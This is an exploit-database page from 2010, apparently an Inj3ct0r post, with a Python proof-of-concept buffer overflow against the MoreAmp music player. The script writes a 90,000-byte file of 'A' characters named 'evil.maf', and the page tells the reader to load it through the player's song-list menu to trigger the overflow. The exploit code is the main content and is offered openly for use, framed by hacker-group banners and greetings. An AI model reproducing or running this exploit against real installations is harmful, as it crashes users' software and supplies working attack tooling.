Home / os / win7

MoreAmp (.maf) Buffer Overflow POC

Posted on 19 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>MoreAmp (.maf) Buffer Overflow POC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================== MoreAmp (.maf) Buffer Overflow POC ================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_&lt;_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ####################################################################################################### #!/usr/bin/python # # Title: MoreAmp (.maf) Buffer Overflow POC # Author: Sid3^effects aKa HaRi # Date: June 19th, 2010 # Platform: Windows XP sp3 En # Thanks to: r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_ # greetz to : All ICW members and my friends luv y0 guyz # # Usage : File--&gt;Open Song List--&gt;load your evil song list(.maf) print &quot;################################################################################&quot; print &quot; MoreAmp (.maf) Buffer Overflow POC &quot; print &quot; By: Sid3^effects &quot; print &quot; Usage: File--&gt;Open Song List--&gt;load your evil song list(.maf) &quot; print &quot;################################################################################&quot; buff = (&quot;x41&quot; * 90000) try: f1 = open(&quot;evil.maf&quot;,&quot;w&quot;); f1.write(buff); f1.close(); print &quot; MoreAmp (.maf) Buffer Overflow POC&quot; print &quot; File Created Successfully. &quot; print &quot;Usage: [-] Click File [-] Open Song list [-] Load you evil file.maf &quot; except: print &quot;Error.&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP